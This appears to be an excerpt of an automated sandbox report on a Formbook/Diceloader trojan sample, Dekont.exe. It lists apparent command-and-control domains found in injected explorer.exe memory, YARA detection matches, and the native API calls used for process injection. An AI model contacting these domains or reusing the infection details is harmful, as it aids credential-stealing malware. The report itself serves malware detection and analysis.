Source: explorer.exe, 00000006.00000000.2095427766.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097513506.000000000C8E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094949963.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096503518.000000000C8D8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory:
  • http://www.avada-casino-tlj.buzz
  • http://www.avada-casino-tlj.buzz/bc01/
  • http://www.avada-casino-tlj.buzz/bc01/www.qzxx.top
  • http://www.avada-casino-tlj.buzzReferer:
  • http://www.eals.lat
  • http://www.eals.lat/bc01/
  • http://www.eals.lat/bc01/www.lussalesapp.website
  • http://www.eals.latReferer:
  • http://www.ebshieldsrenew.live
  • http://www.ebshieldsrenew.live/bc01/
  • http://www.ebshieldsrenew.live/bc01/www.oko.events
  • http://www.ebshieldsrenew.liveReferer:
  • http://www.eddogbrands.website
  • http://www.eddogbrands.website/bc01/
  • http://www.eddogbrands.website/bc01/www.lkjuy.xyz
  • http://www.eddogbrands.websiteReferer:
  • http://www.hildrens-clothing.today
  • http://www.hildrens-clothing.today/bc01/
  • http://www.hildrens-clothing.today/bc01/www.olocaustaffirmer.net
  • http://www.hildrens-clothing.todayReferer:
  • http://www.inancialenlightment.info
  • http://www.inancialenlightment.info/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inancialenlightment.info/bc01/www.omotech-dz.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inancialenlightment.infoReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz/bc01/www.inancialenlightment.info
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyzReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.website
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.website/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.website/bc01/www.48xc300mw.autos
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.websiteReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyz/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyz/bc01/www.eddogbrands.website
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyzReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/www.hildrens-clothing.today
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/www.eals.lat
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.netReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.net/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.net/bc01/www.y-language-menu.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.netReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qzxx.top
          Source: explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qzxx.top/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qzxx.topReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/www.ebshieldsrenew.live
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.netReferer:
          Source: explorer.exe, 00000006.00000002.4536578423.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000006.00000002.4522541380.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3850951608.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2086309850.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.4522128986.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2086309850.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.4520271169.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2078823986.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3095758909.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3854649429.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3849680268.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000002.4536578423.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

          E-Banking Fraud

          Source: Yara match File source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4538701995.000000000E768000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Dekont.exe PID: 1816, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Dekont.exe PID: 5624, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1292, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A330 NtCreateFile,5_2_0041A330
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A3E0 NtReadFile,5_2_0041A3E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A460 NtClose,5_2_0041A460
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A510 NtAllocateVirtualMemory,5_2_0041A510
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A3DB NtReadFile,5_2_0041A3DB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A50F NtAllocateVirtualMemory,5_2_0041A50F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012B60 NtClose,LdrInitializeThunk,5_2_01012B60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01012BF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012AD0 NtReadFile,LdrInitializeThunk,5_2_01012AD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012D10 NtMapViewOfSection,LdrInitializeThunk,5_2_01012D10
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_01012D30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012DD0 NtDelayExecution,LdrInitializeThunk,5_2_01012DD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01012DF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01012C70
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_01012CA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012F30 NtCreateSection,LdrInitializeThunk,5_2_01012F30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01012F90
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012FB0 NtResumeThread,LdrInitializeThunk,5_2_01012FB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012FE0 NtCreateFile,LdrInitializeThunk,5_2_01012FE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_01012E80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01012EA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01014340 NtSetContextThread,5_2_01014340
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01014650 NtSuspendThread,5_2_01014650
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012B80 NtQueryInformationFile,5_2_01012B80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012BA0 NtEnumerateValueKey,5_2_01012BA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012BE0 NtQueryValueKey,5_2_01012BE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012AB0 NtWaitForSingleObject,5_2_01012AB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012AF0 NtWriteFile,5_2_01012AF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012D00 NtSetInformationFile,5_2_01012D00
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012DB0 NtEnumerateKey,5_2_01012DB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012C00 NtQueryInformationProcess,5_2_01012C00
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012C60 NtCreateKey,5_2_01012C60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012CC0 NtQueryVirtualMemory,5_2_01012CC0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012CF0 NtOpenProcess,5_2_01012CF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012F60 NtCreateProcessEx,5_2_01012F60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012FA0 NtQuerySection,5_2_01012FA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012E30 NtWriteVirtualMemory,5_2_01012E30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012EE0 NtQueueApcThread,5_2_01012EE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013010 NtOpenDirectoryObject,5_2_01013010
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013090 NtSetValueKey,5_2_01013090
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010135C0 NtCreateMutant,5_2_010135C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010139B0 NtGetContextThread,5_2_010139B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013D10 NtOpenProcessToken,5_2_01013D10
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013D70 NtOpenThread,5_2_01013D70
          Source: C:\Windows\explorer.exeCode function: 6_2_0E750232 NtCreateFile,6_2_0E750232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E751E12 NtProtectVirtualMemory,6_2_0E751E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0E751E0A NtProtectVirtualMemory,6_2_0E751E0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04D82CA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04D82C70
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82C60 NtCreateKey,LdrInitializeThunk,8_2_04D82C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82DD0 NtDelayExecution,LdrInitializeThunk,8_2_04D82DD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04D82DF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04D82D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04D82EA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82FE0 NtCreateFile,LdrInitializeThunk,8_2_04D82FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82F30 NtCreateSection,LdrInitializeThunk,8_2_04D82F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82AD0 NtReadFile,LdrInitializeThunk,8_2_04D82AD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04D82BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04D82BE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82B60 NtClose,LdrInitializeThunk,8_2_04D82B60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D835C0 NtCreateMutant,LdrInitializeThunk,8_2_04D835C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D84650 NtSuspendThread,8_2_04D84650
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D84340 NtSetContextThread,8_2_04D84340
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82CC0 NtQueryVirtualMemory,8_2_04D82CC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82CF0 NtOpenProcess,8_2_04D82CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82C00 NtQueryInformationProcess,8_2_04D82C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82DB0 NtEnumerateKey,8_2_04D82DB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82D00 NtSetInformationFile,8_2_04D82D00
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D82BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D83090 NtSetValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D83010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D83D70 NtOpenThread
